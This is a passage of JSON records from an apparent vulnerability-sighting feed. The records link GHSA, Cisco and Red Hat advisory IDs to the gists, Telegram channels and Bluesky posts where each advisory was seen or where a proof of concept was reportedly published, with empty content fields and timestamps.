"seen", "source": "Telegram/ndqSuVhr7ns134qjNT7nxq8mmsK2dj9KU_qWewDZAaOd1w", "content": "", "creation_timestamp": "2026-07-29T12:01:45.203737Z"}, {"uuid": "9cce9991-f7c9-47ce-84a0-6b6f504beb1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fm7p-gw32-828p", "type": "seen", "source": "https://gist.github.com/alon710/1cabeec5e425623518fb342992349eb6", "content": "", "creation_timestamp": "2026-07-29T18:31:02.085589Z"}, {"uuid": "8cc91d48-4971-4c8f-a0a0-9dc478c09a2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rwqx-fvqh-6wm4", "type": "seen", "source": "https://gist.github.com/alon710/4dd54cb025c6b4b717455d6420807f40", "content": "", "creation_timestamp": "2026-07-29T19:31:52.676406Z"}, {"uuid": "c3159856-fdc3-4a76-aa46-efc43eb2fc34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fq3f-m5qm-99f5", "type": "seen", "source": "https://gist.github.com/alon710/e40fc20ed683aaeeae74fc5b1a713445", "content": "", "creation_timestamp": "2026-07-29T20:31:26.699021Z"}, {"uuid": "920638fb-cb96-4b32-b9ce-317034863bd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PMWX-RM49-XV39", "type": "seen", "source": "https://gist.github.com/alon710/c7232e977481fa394270e416ffc6a506", "content": "", "creation_timestamp": "2026-07-29T21:31:26.317304Z"}, {"uuid": "e337b282-672e-4c7a-93b6-aefc72f756c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xvg2-cgv6-6h7v", "type": "seen", "source": "https://gist.github.com/alon710/4f3175144e6d12e46b24b49c3b567546", "content": "", "creation_timestamp": "2026-07-29T22:32:10.693011Z"}, {"uuid": "95f332ab-5e62-43dd-a727-74341ec7ab45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mjqf-28ph-426h", "type": "seen", "source": "https://gist.github.com/alon710/6b983b3c12e54633ff798b9f48527899", "content": "", "creation_timestamp": "2026-07-29T23:31:32.248287Z"}, {"uuid": "8f68ecaf-cf3b-4e98-afdf-5fddeb03343f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4MQG-H5JF-J9M7", "type": "seen", "source": "https://t.me/reverseame/3787", "content": "", "creation_timestamp": "2026-07-30T00:02:26.624154Z"}, {"uuid": "5928eba0-e283-4d5a-8eaa-07a7576a4e25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4C8J-MGM4-QQVP", "type": "seen", "source": "https://t.me/nxblog/1745", "content": "", "creation_timestamp": "2026-07-30T00:02:09.735742Z"}, {"uuid": "acfdfbff-0c5c-4815-9abe-22bbf9a31610", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FVCV-HH55-X3R4", "type": "seen", "source": "https://t.me/nxblog/1758", "content": "", "creation_timestamp": "2026-07-30T00:02:09.638556Z"}, {"uuid": "07b5500b-9b9d-40e5-b006-d5c4a3959a94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M42G-XG4C-5F3H", "type": "seen", "source": "https://t.me/sdnv_funkhole/1604", "content": "", "creation_timestamp": "2026-07-30T00:02:09.292818Z"}, {"uuid": "406c8b37-5440-4046-b649-c3fe268b9d12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180328-BFD", "type": "seen", "source": "Telegram/hGorQbjXAWCmitjk3p41x3VI_IGJuK055h4LBYzY57_Q4Q", "content": "", "creation_timestamp": "2026-07-30T00:02:01.701540Z"}, {"uuid": "e576f48c-90eb-4512-972f-1c5291a69154", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180328-BFD", "type": "seen", "source": "Telegram/ndqSuVhr7ns134qjNT7nxq8mmsK2dj9KU_qWewDZAaOd1w", "content": "", "creation_timestamp": "2026-07-30T00:02:01.675220Z"}, {"uuid": "da232ed4-dad6-45f3-83f3-e30fbf81bda6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-H956-RH7X-PPGJ", "type": "published-proof-of-concept", "source": "https://t.me/itpgchannel/3747", "content": "", "creation_timestamp": "2026-07-30T00:00:30.993241Z"}, {"uuid": "0bd6efbf-683a-4f96-97e0-c2ddbeea5f2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7h3g-4w2f-fj2f", "type": "seen", "source": "https://gist.github.com/alon710/0b988f8772f0747494691334f261cc01", "content": "", "creation_timestamp": "2026-07-30T00:32:17.127882Z"}, {"uuid": "0f7ba9e6-118b-4652-aba0-7ac999527770", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MF24-5FXF-F4X5", "type": "seen", "source": "https://t.me/reverseame/4662", "content": "", "creation_timestamp": "2026-07-30T01:01:41.265009Z"}, {"uuid": "382f6b7d-73a4-42d9-a16e-2f2214c3cb18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hf3j-86p7-mfw8", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mrvfmzyzxd23", "content": "", "creation_timestamp": "2026-07-30T21:38:54.661219Z"}, {"uuid": "21eb3bc3-2860-4414-9f67-e8df44130398", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hf3j-86p7-mfw8", "type": "seen", "source": "https://gist.github.com/alon710/2558fd727c5d711082968032190a8577", "content": "", "creation_timestamp": "2026-07-30T21:31:48.222274Z"}, {"uuid": "057905ae-f3cf-4d35-aa97-e1eac06ab626", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qq9q-xgm3-xv9g", "type": "seen", "source": "https://gist.github.com/alon710/118a4cdb35451ca1b82ac84f2659aa47", "content": "", "creation_timestamp": "2026-07-30T22:32:21.496824Z"}, {"uuid": "490db996-c211-40c5-9bef-dc9622d92739", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qq9q-xgm3-xv9g", "type": "seen", "source": "https://gist.github.com/alon710/118a4cdb35451ca1b82ac84f2659aa47", "content": "", "creation_timestamp": "2026-07-31T00:01:11.842593Z"}, {"uuid": "22a6f7a5-42d3-445f-99a5-ab022be398ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hr7p-wg7r-hg9m", "type": "seen", "source": "https://gist.github.com/alon710/937397e52a8e0970b2abb603a8f2aff3", "content": "", "creation_timestamp": "2026-07-31T00:01:11.807414Z"}, {"uuid": "74107c4e-6572-45c4-a132-fa19b1f6502f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JR9P-4H4J-6C58", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/95796", "content": "", "creation_timestamp": "2026-07-31T00:00:38.634286Z"}, {"uuid": "de435e89-3486-495f-8201-fb94f1f67f27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JR9P-4H4J-6C58", "type": "published-proof-of-concept", "source": "Telegram/47AGWfAWFIwZKzQcl_sisfXazYjpo74QYaHVlY-riLjwoTE", "content": "", "creation_timestamp": "2026-07-31T00:00:29.660542Z"}, {"uuid": "cfc9f4ce-73a8-475c-bf52-89065b168ed0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2956-977x-2w3r", "type": "seen", "source": "https://gist.github.com/alon710/3970c6098c97c0a550d8b2c18182c3ad", "content": "", "creation_timestamp": "2026-07-31T00:31:48.890056Z"}, {"uuid": "4b6a501b-0257-46a6-9b95-dbe0731900fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c5px-58j2-7fqp", "type": "seen", "source": "https://gist.github.com/alon710/dc2fc48bf583407e8cd73eba1edb4959", "content": "", "creation_timestamp": "2026-08-01T00:31:31.719480Z"}, {"uuid": "1636d9cd-2e77-4b87-9e6a-5b7529dbe0df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pjp7-q6wp-97qx", "type": "seen", "source": "https://gist.github.com/alon710/32cccaf1dfa9c1c40b850f71e29f1c0f", "content": "", "creation_timestamp": "2026-08-01T02:31:13.555965Z"}, {"uuid": "aa1b1707-f14f-4433-af6f-ee4405925370", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wg4g-wm44-ch5j", "type": "seen", "source": "https://gist.github.com/alon710/1bc8c607afec88c321177b4e1f89ad03", "content": "", "creation_timestamp": "2026-08-01T03:32:01.435834Z"}, {"uuid": "ba6b6fc2-b48a-46f3-a6df-ea5dd60e0223", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-34rh-wp3j-6cxc", "type": "seen", "source": "https://gist.github.com/alon710/402cd5e451c20f1dfc47c5b8f0cf1ddb", "content": "", "creation_timestamp": "2026-08-01T04:31:50.429318Z"}, {"uuid": "131a777d-b985-42ad-9d3a-86f36cfdbbd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W9VV-Q986-VJ7X", "type": "seen", "source": "https://t.me/hn_best_comments/30331", "content": "", "creation_timestamp": "2026-08-01T08:00:05.086873Z"}, {"uuid": "c72cb509-0591-48b8-b600-05569e9470a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "RHSA-2020:4157", "type": "seen", "source": "Telegram/FZOsY2k7WJ6AFbS8POLza0WyKoHuy17v_x6w4oGouFfsv88", "content": "", "creation_timestamp": "2026-08-01T09:00:05.445355Z"}, {"uuid": "e17dc631-bc87-4da4-9d9c-c474642b2f9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M42G-XG4C-5F3H", "type": "published-proof-of-concept", "source": "https://t.me/sdnv_funkhole/1604", "content": "", "creation_timestamp": "2026-08-02T00:00:22.478009Z"}, {"uuid": "b64e610c-2889-458f-86fe-53fb4e7f7c85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FVCV-HH55-X3R4", "type": "published-proof-of-concept", "source": "https://t.me/nxblog/1758", "content": "", "creation_timestamp": "2026-08-02T00:00:22.078563Z"}, {"uuid": "0d2dab5b-9294-4441-8dca-aead517647ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4C8J-MGM4-QQVP", "type": "seen", "source": "https://t.me/nxblog/1745", "content": "", "creation_timestamp": "2026-08-02T00:00:21.867015Z"}, {"uuid": "617e9fda-c903-4b03-a49f-4274cd43a13e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MF24-5FXF-F4X5", "type": "seen", "source": "https://t.me/reverseame/4662", "content": "", "creation_timestamp": "2026-08-02T06:10:56.229694Z"}, {"uuid": "4a211e8d-dcf6-4f17-bec3-c04bbabf4db9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4MQG-H5JF-J9M7", "type": "seen", "source": "https://t.me/reverseame/3787", "content": "", "creation_timestamp": "2026-08-02T12:00:03.538613Z"}, {"uuid": "25e5f329-8900-453c-9711-41539557be95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M985-3F3V-CWMM", "type": "seen", "source": "https://t.me/reverseame/1405", "content": "", "creation_timestamp": "2026-08-03T08:00:04.281822Z"}, {"uuid": "d3136a3e-c9a3-4e4e-bc2a-e56a90e2243d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M985-3F3V-CWMM", "type": "seen", "source": "https://t.me/reverseame/1405", "content": "", "creation_timestamp": "2026-08-04T00:00:45.953744Z"}, {"uuid": "5eb6f2aa-5166-492e-b179-56c86e98f029", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m2h6-j472-rp4c", "type": "seen", "source": "https://gist.github.com/alon710/ab6ab460d039209b756930fd867ab75f", "content": "", "creation_timestamp": "2026-08-04T00:00:43.664180Z"}, {"uuid": "c42beb9b-6e06-44e6-ad78-f9185f83164d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jwv3-5hgf-82ww", "type": "seen", "source": "https://gist.github.com/alon710/5ac467a3d50f6bfb29b3f3cc3d2c5925", "content": "", "creation_timestamp": "2026-08-04T00:00:43.568759Z"}, {"uuid": "dde1c0a4-e9e2-4381-8690-88f9137ecd48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fxqj-rqcc-2cmp", "type": "seen", "source": "https://gist.github.com/alon710/cea21195fa5b2fd7a130b5ccd15ff053", "content": "", "creation_timestamp": "2026-08-03T18:31:17.160344Z"}, {"uuid": "086e45de-2e9e-4cd6-8b59-6ae17f5ee958", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jj27-h5hq-8x99", "type": "seen", "source": "https://gist.github.com/alon710/bdd530b55ab23396bc2ee2dc380962dc", "content": "", "creation_timestamp": "2026-08-03T19:31:37.144152Z"}, {"uuid": "e2f7b99c-d96b-48ae-81bd-dfa944dff313", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4cwx-7wf7-3272", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3ms77zcaiyk2n", "content": "", "creation_timestamp": "2026-08-03T19:25:00.532742Z"}, {"uuid": "4d89a3ff-873f-4678-a7ad-7c7da881b29f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mwp4-54f8-5fhr", "type": "seen", "source": "https://gist.github.com/alon710/572dbe4f17925376407c061da3100fba", "content": "", "creation_timestamp": "2026-08-03T20:31:35.272392Z"}, {"uuid": "a1cdd2f8-dba5-458a-9421-bd6c97d4dda6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hf85-99vj-m4c5", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3ms7f2blmgt2q", "content": "", "creation_timestamp": "2026-08-03T20:55:02.860788Z"}, {"uuid": "acb4fef3-80d8-464d-91a6-e329261d8064", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cq5v-8q36-5273", "type": "seen", "source": "https://gist.github.com/alon710/cb22e8e296a36049522556dbfd0c36bc", "content": "", "creation_timestamp": "2026-08-03T21:32:44.833549Z"}, {"uuid": "fb4e7b47-7db5-4a92-9cd3-7abb2dce9164", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m2h6-j472-rp4c", "type": "seen", "source": "https://gist.github.com/alon710/ab6ab460d039209b756930fd867ab75f", "content": "", "creation_timestamp": "2026-08-03T22:31:31.293608Z"}, {"uuid": "0d7c5421-4384-4366-b04b-a4ef5d9a8a9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F55J-VVR9-69XV", "type": "seen", "source": "https://t.me/sysadm_in_up/2554", "content": "", "creation_timestamp": "2026-08-03T23:00:13.573853Z"}, {"uuid": "60d5e7b5-2028-49aa-9a23-6bfa55967066", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jwv3-5hgf-82ww", "type": "seen", "source": "https://gist.github.com/alon710/5ac467a3d50f6bfb29b3f3cc3d2c5925", "content": "", "creation_timestamp": "2026-08-03T23:31:38.868943Z"}, {"uuid": "9fb678ba-5f40-4232-a05f-9372236debf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C8CC-PHH7-XMXR", "type": "seen", "source": "https://t.me/cyberok_news/154", "content": "", "creation_timestamp": "2026-08-05T00:00:36.766442Z"}, {"uuid": "e5d1fcee-75e2-4918-8f8c-02b609b59434", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-V4PR-FM98-W9PG", "type": "seen", "source": "https://t.me/cyberok_news/173", "content": "", "creation_timestamp": "2026-08-05T00:00:36.484134Z"}, {"uuid": "83905f2b-712f-44af-bcb6-dcd6b2740c05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M93H-4HW7-5QCM", "type": "seen", "source": "https://t.me/cyberok_news/232", "content": "", "creation_timestamp": "2026-08-05T00:00:35.574446Z"}, {"uuid": "afc0544b-011c-45ae-8cee-19ebb07b3bd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-H2P2-W857-329F", "type": "published-proof-of-concept", "source": "https://t.me/kiberdruzhinnik/73", "content": "", "creation_timestamp": "2026-08-05T00:00:27.688485Z"}, {"uuid": "71f1a7e1-23fd-42d3-a826-27a38997f0d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xpp7-93x6-v29m", "type": "seen", "source": "https://gist.github.com/alon710/3fbc424d9726688cb9c9bb1b3b35fa73", "content": "", "creation_timestamp": "2026-08-05T00:31:06.087712Z"}, {"uuid": "fb22205e-d330-4362-bcba-00db20658874", "vulnerability_lookup_origin": "c8fb6bf1-f81f-4cb8-95b1-eadbb3b54ee8", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-UNASSIGNED-2020-ZYXEL-CPE-COMMAND-INJECTION-RCE-01", "type": "exploited", "source": "https://db.gcve.eu/known-exploited-vulnerabilities-catalog/0b9a43b4-ebb4-4411-9261-9c0d9b378a1f", "content": "", "creation_timestamp": "2026-08-05T01:01:06.078366Z"}, {"uuid": "e60817a2-74dd-4096-a90b-af9ef93f581f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7mpp-r37j-x5wh", "type": "seen", "source": "https://gist.github.com/alon710/a8f899d9b938031c01419f5cf3be4d0e", "content": "", "creation_timestamp": "2026-08-05T01:31:27.386644Z"}, {"uuid": "42b58040-6860-4da5-870b-7a9b5eb38500", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cjc9-q5gf-327p", "type": "seen", "source": "https://gist.github.com/alon710/8b519f2c594fb49b15bc37a85db39cf9", "content": "", "creation_timestamp": "2026-08-05T02:31:21.595768Z"}, {"uuid": "6343b47a-6912-420f-82bd-3289f10ea236", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cj62-hvv2-2q5h", "type": "seen", "source": "https://gist.github.com/alon710/7709dc60acce15f366b5c87665dcce14", "content": "", "creation_timestamp": "2026-08-05T03:31:03.381640Z"}, {"uuid": "cb941357-b895-4c82-ad6e-cf5bd32d685a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gcvv-72q8-9v76", "type": "seen", "source": "https://gist.github.com/alon710/f018a48cf6aafd68bd8bc1eabe897a46", "content": "", "creation_timestamp": "2026-08-05T04:31:14.915597Z"}, {"uuid": "92e273a9-1ad4-4aaa-b2a2-67ffa3d1b0c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jm22-3w23-5q7w", "type": "seen", "source": "https://gist.github.com/alon710/0b530d759c455a262a40add3fda52d22", "content": "", "creation_timestamp": "2026-08-05T05:32:02.086625Z"}, {"uuid": "49bc7bbc-3200-4f79-a8e9-4e010ed81a84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g366-23fw-ggp6", "type": "seen", "source": "https://gist.github.com/alon710/12c62bdb45c24ef118204a5bc7818a85", "content": "", "creation_timestamp": "2026-08-05T06:32:52.174200Z"}, {"uuid": "d6e322c3-6fc5-4e0c-947d-c83af8076452", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-ch52-px8q-f22j", "type": "seen", "source": "https://gist.github.com/alon710/e46f39ae43e3fffa5ce1183a133d472c", "content": "", "creation_timestamp": "2026-08-05T07:31:31.591410Z"}, {"uuid": "5f60791f-04d1-4d6b-849f-099ea65d7585", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wvp2-4qqp-4h3r", "type": "seen", "source": "https://gist.github.com/alon710/489e9ca002ac3cb955fb509b828c43ec", "content": "", "creation_timestamp": "2026-08-05T08:32:27.907632Z"}, {"uuid": "7bf71863-c369-4e7d-9ca0-30254ec0f99e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4wx2-7gvj-qfq3", "type": "seen", "source": "https://gist.github.com/alon710/8a67496a2aeb5dc5719baf5a0f706ea5", "content": "", "creation_timestamp": "2026-08-05T09:31:26.149313Z"}, {"uuid": "c81a3357-5f42-4455-91c6-4447bc722524", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-944x-pm95-3jpr", "type": "seen", "source": "https://gist.github.com/alon710/f15b7efa1dfc268f551e391b3e8839f1", "content": "", "creation_timestamp": "2026-08-05T10:31:29.907223Z"}, {"uuid": "aebf560e-ada8-4e3a-9363-4dc9f83b1fe8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RG69-33G2-MP48", "type": "seen", "source": "https://t.me/cyberok_news/97", "content": "", "creation_timestamp": "2026-08-06T00:00:47.603518Z"}, {"uuid": "460b6e75-2074-4b68-a204-cf4bfd411413", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F82V-JWR5-MFFW", "type": "published-proof-of-concept", "source": "https://t.me/wh_lab/82", "content": "", "creation_timestamp": "2026-08-06T00:00:44.065046Z"}, {"uuid": "52066446-230f-420f-b13c-8443b0e8c755", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170405-AME", "type": "published-proof-of-concept", "source": "https://t.me/KaitNews/3896", "content": "", "creation_timestamp": "2026-08-06T00:00:35.369805Z"}, {"uuid": "c83a8146-b227-4653-a866-712a8a69347f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7PGQ-CR25-XVC8", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3364", "content": "", "creation_timestamp": "2026-08-06T00:00:34.625195Z"}, {"uuid": "b076fdc6-acd9-4ac6-8bac-df47065d5459", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170322-IOX", "type": "published-proof-of-concept", "source": "https://t.me/KaitNews/3649", "content": "", "creation_timestamp": "2026-08-06T00:00:33.722446Z"}, {"uuid": "024ddd29-eab0-4108-9560-cac011ea36da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-42cj-m3vj-89wv", "type": "seen", "source": "https://gist.github.com/alon710/8d9bdd08d5f9d0638cb7af9de6c94fc7", "content": "", "creation_timestamp": "2026-08-06T00:00:18.191083Z"}, {"uuid": "b23b4367-3885-44f1-bc57-4f2916f1c3f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qq9q-x9w4-chhj", "type": "seen", "source": "https://gist.github.com/alon710/55629b813908ae24f1e292f2b3f6a8d5", "content": "", "creation_timestamp": "2026-08-06T00:00:17.833124Z"}, {"uuid": "923dce4b-b90e-4310-bd89-3c3864faf453", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9pgf-384g-p7mv", "type": "seen", "source": "https://gist.github.com/alon710/9e89754682c03d2a6b1ce15876ecc693", "content": "", 